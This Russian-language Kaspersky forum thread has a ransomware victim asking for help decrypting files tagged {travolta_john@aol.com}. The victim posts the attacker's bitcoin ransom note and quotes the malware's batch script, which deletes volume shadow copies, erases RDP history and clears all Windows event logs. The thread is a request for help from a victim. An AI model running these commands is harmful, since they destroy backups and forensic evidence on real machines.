Перейти к содержанию
19 лет клубу! Встречаемся в офисе «Лаборатории Касперского»

Шифровальшик {travolta_john@aol.com}

Artem Parfenenko
 Поделиться

Рекомендуемые сообщения

Artem Parfenenko Новичок

Artem Parfenenko

Опубликовано
Опубликовано

Здравствуйте

 

Зашифровали все рабочие данные.
с добавлением к имени "{travolta_john@aol.com}"
Во всех папках прилагался файл:

how_to_back_files.html

 

проверили с помошью

Выявлены следующие результаты:
https://ibb.co/gkS4L0

https://ibb.co/dEmBYL

bat файл содержил следующую информацию:

 

@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp 
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
 
Логи в файле:
CollectionLog-2018.10.31-12.07.zip

 

Спасибо, очень ждем Вашей помощи.

 
 

how_to_back_files.html

CollectionLog-2018.10.31-12.07.zip

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Автологер разве не предупредил вас, что запущен из терминальной сессии, а надо из консоли?

По возможности, переделайте.

 

+ пару зашифрованных документов в архиве прикрепите к следующему сообщению.

Ссылка на комментарий
Поделиться на другие сайты
Artem Parfenenko Новичок

Artem Parfenenko

Опубликовано
  • Автор
Опубликовано

К сожалению проделать выгрузку логов не из терминала, нет возможности.
Файлы для примера в Архиве "Примеры.rar".

 

Примеры.rar

Ссылка на комментарий
Поделиться на другие сайты
Artem Parfenenko Новичок

Artem Parfenenko

Опубликовано
  • Автор
Опубликовано

Переписка с злоумышленником:

1 ID = 0.5 BTC 
For decrypt need pay 0.5 BTC 
You can send me one file for test. 
File only picture or text. No database, no backup. 
Only we can decrypt your data.
 
 
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • sergei5
      шифровальшик зашировал все данные
      Автор sergei5
      Добрый день Вирус зашифровал все данные файл с расширением  62IKGXJL  помогите восстановить. Буду вам признателен.
    • Синтезит
      ШИФРОВАЛЬШИК datastore@cyberfear.com
      Автор Синтезит
      Здравствуйте, помогите пожалуйста расшифровать.
      Ссылка на зашифрованные файлы от платформы 1с
      https://dropmefiles.com/8aGW7 пароль 0uJxTd
       
      Чистые файлы из архива Windows
      https://dropmefiles.com/PzSaC пароль ecUlCq
      Addition.txt FRST.txt
    • RusLine
      Помогите нарвался на шифровальшика.
      Автор RusLine
      Здравствуйте помогите чем сможете. Скачал с nnmclub total commander попользовался а утром зашифровало все фото файлы важные. Подскажите что делать ?
        



    • Serg1619
      Поймал шифровальщик со странным расширением abdula.a@aol.com
      Автор Serg1619
      С утра на сервере все значки стали тектостовыми файлами с расширением abdula.a@aol.com,при открытии фаилой везде открывается блокном с требованием написать им на почту для того чтоб разблокировать.
      Как то можно расшифровать все файлы?или все уже безнадежно?
    • Samoxval
      Поймали шифровальшика файлы с расширением .nigra
      Автор Samoxval
      Поймали шифровальщик. Расширение .nigra
      Скорее всего по рдп, сам вирус не нашли.
      Установили новый диск и на него накатили чистую виндовс, старые 2 диска осталис подключены как второстепенные, систему на них не трогали.
      Если есть возможность нам спасти файлы (несколько из них приложил) за месяц. Тоесть это файлы кассовой смены 1 файл= 1 кассовая смена. Более нам ничего не требуется с этих дисков. Либо база sql там эти все смены хранятся.
      Зашифрованые файлы.rar
      Первоначальное расширение файлов .udb
       
×
×
  • Создать...